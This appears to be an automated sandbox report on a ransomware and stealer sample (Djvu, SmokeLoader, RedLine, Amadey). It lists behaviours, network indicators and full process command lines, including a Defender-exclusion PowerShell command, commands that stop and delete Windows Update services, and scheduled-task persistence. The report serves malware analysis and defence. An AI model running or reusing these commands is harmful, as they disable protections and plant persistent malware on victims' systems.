Analysis Overview
SHA256
b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074
Threat Level: Known bad
The file b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074 was found to be: Known bad.
Malicious Activity Summary
Djvu Ransomware
Detected Djvu ransomware
Detect Fabookie payload
Amadey
Fabookie
RedLine
SmokeLoader
Downloads MZ/PE file
Stops running service(s)
Deletes itself
Reads user/profile data of web browsers
Modifies file permissions
Loads dropped DLL
Executes dropped EXE
Adds Run key to start application
Looks up external IP address via web service
Suspicious use of SetThreadContext
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Uses Task Scheduler COM API
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-07-23 14:43
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-23 14:43
Reported
2023-07-23 14:46
Platform
win10-20230703-en
Max time kernel
52s
Max time network
152s
Command Line
Signatures
Amadey
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detected Djvu ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Djvu Ransomware
Fabookie
RedLine
SmokeLoader
Downloads MZ/PE file
Stops running service(s)
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\regsvr32.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2767205360-3565838719-3800013281-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\aedd73e6-9adb-4462-acf1-aec438f9708d\\F52D.exe\" --AutoStart" | C:\Users\Admin\AppData\Local\Temp\F52D.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4204 set thread context of 2696 | N/A | C:\Users\Admin\AppData\Local\Temp\F52D.exe | C:\Users\Admin\AppData\Local\Temp\F52D.exe |
| PID 4692 set thread context of 4112 | N/A | C:\Users\Admin\AppData\Local\Temp\3163.exe | C:\Users\Admin\AppData\Local\Temp\3163.exe |
| PID 4904 set thread context of 4524 | N/A | C:\Users\Admin\AppData\Local\Temp\F52D.exe | C:\Users\Admin\AppData\Local\Temp\F52D.exe |
| PID 4328 set thread context of 4576 | N/A | C:\Users\Admin\AppData\Local\Temp\38E6.exe | C:\Users\Admin\AppData\Local\Temp\38E6.exe |
| PID 360 set thread context of 4204 | N/A | C:\Users\Admin\AppData\Local\Temp\3CBF.exe | C:\Users\Admin\AppData\Local\Temp\3CBF.exe |
| PID 884 set thread context of 2368 | N/A | C:\Users\Admin\AppData\Local\Temp\4701.exe | C:\Users\Admin\AppData\Local\Temp\4701.exe |
| PID 4652 set thread context of 4988 | N/A | C:\Users\Admin\AppData\Local\Temp\3163.exe | C:\Users\Admin\AppData\Local\Temp\3163.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\System32\sc.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\System32\sc.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Windows\System32\sc.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\oldplayer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe
"C:\Users\Admin\AppData\Local\Temp\b86abfa366ede43ffd0e3965043b5fa5e7a233f02175e08fe007fa0257cfa074.exe"
C:\Users\Admin\AppData\Local\Temp\F52D.exe
C:\Users\Admin\AppData\Local\Temp\F52D.exe
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\F79F.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\F79F.dll
C:\Users\Admin\AppData\Local\Temp\F52D.exe
C:\Users\Admin\AppData\Local\Temp\F52D.exe
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\F8AA.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\F8AA.dll
C:\Users\Admin\AppData\Local\Temp\FC93.exe
C:\Users\Admin\AppData\Local\Temp\FC93.exe
C:\Users\Admin\AppData\Local\Temp\1E.exe
C:\Users\Admin\AppData\Local\Temp\1E.exe
C:\Users\Admin\AppData\Local\Temp\909.exe
C:\Users\Admin\AppData\Local\Temp\909.exe
C:\Users\Admin\AppData\Local\Temp\13A8.exe
C:\Users\Admin\AppData\Local\Temp\13A8.exe
C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\aedd73e6-9adb-4462-acf1-aec438f9708d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
C:\Users\Admin\AppData\Local\Temp\aafg31.exe
"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"
C:\Users\Admin\AppData\Local\Temp\F52D.exe
"C:\Users\Admin\AppData\Local\Temp\F52D.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\3163.exe
C:\Users\Admin\AppData\Local\Temp\3163.exe
C:\Users\Admin\AppData\Local\Temp\3163.exe
C:\Users\Admin\AppData\Local\Temp\3163.exe
C:\Users\Admin\AppData\Local\Temp\3CBF.exe
C:\Users\Admin\AppData\Local\Temp\3CBF.exe
C:\Users\Admin\AppData\Local\Temp\38E6.exe
C:\Users\Admin\AppData\Local\Temp\38E6.exe
C:\Users\Admin\AppData\Local\Temp\F52D.exe
"C:\Users\Admin\AppData\Local\Temp\F52D.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
C:\Users\Admin\AppData\Local\Temp\38E6.exe
C:\Users\Admin\AppData\Local\Temp\38E6.exe
C:\Users\Admin\AppData\Local\Temp\3CBF.exe
C:\Users\Admin\AppData\Local\Temp\3CBF.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Users\Admin\AppData\Local\Temp\4701.exe
C:\Users\Admin\AppData\Local\Temp\4701.exe
C:\Users\Admin\AppData\Local\Temp\48C7.exe
C:\Users\Admin\AppData\Local\Temp\48C7.exe
C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:N"
C:\Users\Admin\AppData\Local\Temp\3163.exe
"C:\Users\Admin\AppData\Local\Temp\3163.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\4701.exe
C:\Users\Admin\AppData\Local\Temp\4701.exe
C:\Users\Admin\AppData\Local\Temp\3163.exe
"C:\Users\Admin\AppData\Local\Temp\3163.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\38E6.exe
"C:\Users\Admin\AppData\Local\Temp\38E6.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\38E6.exe
"C:\Users\Admin\AppData\Local\Temp\38E6.exe" --Admin IsNotAutoStart IsNotTask
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:N"
C:\Users\Admin\AppData\Local\Temp\3CBF.exe
"C:\Users\Admin\AppData\Local\Temp\3CBF.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\75E3.exe
C:\Users\Admin\AppData\Local\Temp\75E3.exe
C:\Users\Admin\AppData\Local\Temp\3CBF.exe
"C:\Users\Admin\AppData\Local\Temp\3CBF.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\2d8bb23e-3252-4b21-85dd-24435df8e989\build2.exe
"C:\Users\Admin\AppData\Local\2d8bb23e-3252-4b21-85dd-24435df8e989\build2.exe"
C:\Users\Admin\AppData\Local\Temp\75E3.exe
C:\Users\Admin\AppData\Local\Temp\75E3.exe
C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\4701.exe
"C:\Users\Admin\AppData\Local\Temp\4701.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\4701.exe
"C:\Users\Admin\AppData\Local\Temp\4701.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\75E3.exe
"C:\Users\Admin\AppData\Local\Temp\75E3.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Users\Admin\AppData\Local\7e5be61e-971d-4ec9-ace4-0b4034dfc840\build2.exe
"C:\Users\Admin\AppData\Local\7e5be61e-971d-4ec9-ace4-0b4034dfc840\build2.exe"
C:\Users\Admin\AppData\Local\b8ac3a68-d9ec-4bf8-99a2-89564ebf6f7d\build2.exe
"C:\Users\Admin\AppData\Local\b8ac3a68-d9ec-4bf8-99a2-89564ebf6f7d\build2.exe"
C:\Users\Admin\AppData\Local\Temp\75E3.exe
"C:\Users\Admin\AppData\Local\Temp\75E3.exe" --Admin IsNotAutoStart IsNotTask
C:\Users\Admin\AppData\Local\43f82b68-edc8-4a1e-9011-0ea5099e13b2\build2.exe
"C:\Users\Admin\AppData\Local\43f82b68-edc8-4a1e-9011-0ea5099e13b2\build2.exe"
C:\Users\Admin\AppData\Local\84157034-ca5e-442c-bf8d-21d61ac80561\build2.exe
"C:\Users\Admin\AppData\Local\84157034-ca5e-442c-bf8d-21d61ac80561\build2.exe"
C:\Users\Admin\AppData\Local\2fa70290-fab9-4bdb-a9fa-fce0d79afe3f\build2.exe
"C:\Users\Admin\AppData\Local\2fa70290-fab9-4bdb-a9fa-fce0d79afe3f\build2.exe"
C:\Users\Admin\AppData\Local\2d8bb23e-3252-4b21-85dd-24435df8e989\build2.exe
"C:\Users\Admin\AppData\Local\2d8bb23e-3252-4b21-85dd-24435df8e989\build2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Users\Admin\AppData\Local\b8ac3a68-d9ec-4bf8-99a2-89564ebf6f7d\build2.exe
"C:\Users\Admin\AppData\Local\b8ac3a68-d9ec-4bf8-99a2-89564ebf6f7d\build2.exe"
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Users\Admin\AppData\Local\7e5be61e-971d-4ec9-ace4-0b4034dfc840\build2.exe
"C:\Users\Admin\AppData\Local\7e5be61e-971d-4ec9-ace4-0b4034dfc840\build2.exe"
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop bits
C:\Users\Admin\AppData\Local\43f82b68-edc8-4a1e-9011-0ea5099e13b2\build2.exe
"C:\Users\Admin\AppData\Local\43f82b68-edc8-4a1e-9011-0ea5099e13b2\build2.exe"
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
C:\Users\Admin\AppData\Local\84157034-ca5e-442c-bf8d-21d61ac80561\build2.exe
"C:\Users\Admin\AppData\Local\84157034-ca5e-442c-bf8d-21d61ac80561\build2.exe"
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
C:\Windows\System32\reg.exe
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
C:\Users\Admin\AppData\Local\2fa70290-fab9-4bdb-a9fa-fce0d79afe3f\build2.exe
"C:\Users\Admin\AppData\Local\2fa70290-fab9-4bdb-a9fa-fce0d79afe3f\build2.exe"
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | potunulit.org | udp |
| US | 188.114.97.0:80 | potunulit.org | tcp |
| US | 8.8.8.8:53 | colisumy.com | udp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| US | 8.8.8.8:53 | 0.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.254.120.175.in-addr.arpa | udp |
| NL | 194.169.175.139:3003 | 194.169.175.139 | tcp |
| US | 8.8.8.8:53 | 139.175.169.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 254.217.0.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | nordskills.eu | udp |
| PS | 213.6.54.58:443 | nordskills.eu | tcp |
| US | 8.8.8.8:53 | 1.202.248.87.in-addr.arpa | udp |
| DE | 45.9.74.80:80 | 45.9.74.80 | tcp |
| US | 8.8.8.8:53 | 58.54.6.213.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.14.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.74.9.45.in-addr.arpa | udp |
| FR | 178.32.90.250:29608 | tcp | |
| FR | 178.32.90.250:29608 | tcp | |
| US | 8.8.8.8:53 | 250.90.32.178.in-addr.arpa | udp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| US | 8.8.8.8:53 | us.imgjeoigaa.com | udp |
| HK | 103.100.211.218:80 | us.imgjeoigaa.com | tcp |
| US | 8.8.8.8:53 | 218.211.100.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | aa.imgjeoogbb.com | udp |
| HK | 154.221.26.108:80 | aa.imgjeoogbb.com | tcp |
| US | 8.8.8.8:53 | 108.26.221.154.in-addr.arpa | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| RU | 5.42.65.80:80 | 5.42.65.80 | tcp |
| NL | 194.169.175.139:3003 | 194.169.175.139 | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 80.65.42.5.in-addr.arpa | udp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| FR | 178.32.90.250:29608 | tcp | |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| US | 8.8.8.8:53 | zexeq.com | udp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| PE | 190.12.87.61:80 | zexeq.com | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 61.87.12.190.in-addr.arpa | udp |
| PE | 190.12.87.61:80 | zexeq.com | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| PE | 190.12.87.61:80 | zexeq.com | tcp |
| PE | 190.12.87.61:80 | zexeq.com | tcp |
| US | 8.8.8.8:53 | greenbi.net | udp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| US | 8.8.8.8:53 | 231.10.119.175.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.57.101.20.in-addr.arpa | udp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| NL | 162.0.217.254:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| PE | 190.12.87.61:80 | zexeq.com | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.120.254.9:80 | colisumy.com | tcp |
| PE | 190.12.87.61:80 | zexeq.com | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| PE | 190.12.87.61:80 | zexeq.com | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.193.132.51.in-addr.arpa | udp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| US | 8.8.8.8:53 | 22.249.124.192.in-addr.arpa | udp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| KR | 175.119.10.231:80 | greenbi.net | tcp |
| DE | 168.119.51.197:13370 | 168.119.51.197 | tcp |
| US | 8.8.8.8:53 | 197.51.119.168.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 168.119.51.197:13370 | 168.119.51.197 | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| DE | 168.119.51.197:13370 | 168.119.51.197 | tcp |
Files
memory/2780-118-0x0000000002840000-0x0000000002940000-memory.dmp
memory/2780-119-0x0000000000400000-0x000000000246F000-memory.dmp
memory/2780-120-0x0000000003F50000-0x0000000003F59000-memory.dmp
